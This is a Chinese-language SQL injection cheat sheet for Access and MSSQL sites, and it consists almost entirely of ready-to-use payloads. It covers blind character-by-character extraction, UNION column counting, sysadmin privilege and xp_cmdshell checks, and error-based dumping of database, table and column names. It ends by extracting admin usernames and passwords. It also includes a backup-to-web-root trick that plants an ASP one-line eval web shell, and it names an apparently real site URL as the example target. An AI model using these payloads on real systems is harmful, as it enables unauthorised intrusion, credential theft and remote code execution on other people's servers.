通用查询
and (select count(*) from 表名)>=0
and (select count(字段名) from 表名)>=0
猜字段值长度
and (select top 1 len(字段名) from 表名)>1
and (select top 1 len(字段名) from 表名)>n-1 正常
and (select top 1 len(字段名) from 表名)>n 出错
说明字段长度为n
猜字段值内容
and (select top 1 asc(mid(字段名,1,1)) from 表名)>1
and (select top 1 asc(mid(字段名,1,1)) from 表名)=97
字段值内容的第一个值为a (a的编码是97)
and (select top 1 asc(mid(字段名,2,1)) from 表名)>1
and (select top 1 asc(mid(字段名,2,1)) from 表名)=98
字段值内容的第二个值为b (a的编码是98)
...
...
以此类推...
有时候可能 帐号是汉字的话 只需将与汉字的ascii值比较即可
联合查询
首先判断是否存在注入
之后 order by 长度 http://www.ename.cn/DomainFind.asp?id=2356
order by 8 正常
order by 9 出错
字段数目为 8个
之后
union select 1,2,3,4,5,6,7,8 from 表名
爆出数字 3. 7
union select 1,2,字段名1,4,5,6,字段名2,8 from 表名
and user>0 出错提示类型不匹配 -- mssql数据库
and (select count(*) from sysobjects)>=0
正常 -- mssql数据库
sysobjects 是 mssql系统表
msysobjects 是 access系统表
之后判断权限
and 1=(select is_srvrolemember('sysadmin')) 正常sa权限
and 1=(select is_srvrolemember('db_owner')) db权限
and 1=(select is_srvrolemember('public')) public权限
sa权限的话
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') //判断XP_CMDSHELL是否存在
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread') //查看XP_regread扩展存储过程是不是已经被删除
1.
;backup database 数据库名 to disk='c:\db.bak'--
2.
;create table cmd(cmd image)--
3.
;insert into cmd(cmd) values ('<%%25eval(request("a")):response.end%%25>')--
4.
;backup database 数据库名 to disk='D:\www_web\aaa.asp' WITH DIFFERENTIAL FORMAT--
5.
;drop table cmd--
一句话转换成十六进制成功率会比较高,其他的换成16位进制编码也可以
mssql having 1=1-- 暴库注入
having 1=1-- 会爆出表名等等内容 如果权限不足的情况下可以爆库注入
group by 字段名1 having 1=1--
group by 字段名1,字段名2 having 1=1--
group by 字段名1,字段名2,...,字段名n having 1=1--
之后
union select 1,字段名1,字段名2,4.5.6.7 from 表名
order by 与数据类型转换爆错法
方法1:
and db_name()=0--
and db_name(n)>0-- 获得所有数据库名
方法2:
and 1=(select name from master.dbo.sysdatabases where dbid=1)--
and 1=(select name from master.dbo.sysdatabases where dbid=2)--
...
and 1=(select name from master.dbo.sysdatabases where dbid=n)--
爆当前数据库里面的表名
and (select top 1 name from (select top 1 name from sysobjects where xtype=0x75 order by name) t order by name desc)=0
and (select top 1 name from (select top 2 name from sysobjects where xtype=0x75 order by name) t order by name desc)=0
...
and (select top 1 name from (select top n name from sysobjects where xtype=0x75 order by name) t order by name desc)=0
爆出表名为 adminmaster
之后爆字段
and (select col_name(object_id('adminmaster'),1))=0
and (select col_name(object_id('adminmaster'),2))=0
爆出username password
爆内容
and (select top 1 username from adminmaster)>0 爆出keio用户
之后继续爆其他的用户名
and (select top 1 username from adminmaster where username<>'keio')>0
之后依此类推
确认数据类型联合查询
and 1=2 union all select 1,null,null,null,null,null,null,null,null,null,null,null from sysobjects--
and 1=2 union all select 1,2,3,'null',5,6,7,8,9 from sysobjects--
查数据库
and 1=2 union all select 1,2,3,(select name from master.dbo.sysdatabases where dbid=1),5,6,7,8,9 from sysobjects--
and 1=2 union all select 1,2,3,(select name from master.dbo.sysdatabases where dbid=2),5,6,7,8,9 from sysobjects--
...
查表
and 1=2 union all select 1,2,3, (select top 1 name from (select top 1 name from sysobjects where xtype=0x75 order by name) t order by name desc)
,5,6,7,8,9 from sysobjects--
and 1=2 union all select 1,2,3, (select top 1 name from (select top 2 name from sysobjects where xtype=0x75 order by name) t order by name desc)
,5,6,7,8,9 from sysobjects--
...
表名 若为 adminmaster
查字段名
and 1=2 union all select 1,2,3,(select col_name(object_id('adminmaster'),1)),5,6,7,8,9 from sysobjects--
and 1=2 union all select 1,2,3,(select col_name(object_id('adminmaster'),2)),5,6,7,8,9 from sysobjects--
...
and 1=2 union all select 1,2,3,(select col_name(object_id('adminmaster'),n)),5,6,7,8,9 from sysobjects--
若字段名为username password
爆字段内容
and 1=2 union all select 1,2,3,(select top 1 username from adminmaster ),5,6,7,8,9 from sysobjects-- keio
爆字段内容
and 1=2 union all select 1,2,3,(select password from adminmaster where username='keio'),5,6,7,8,9 from sysobjects--
得到第一个用户keio的密码
爆第二用户
and 1=2 union all select 1,2,3,(select top 1 username from adminmaster where username<>'keio'),5,6,7,8,9 from sysobjects--
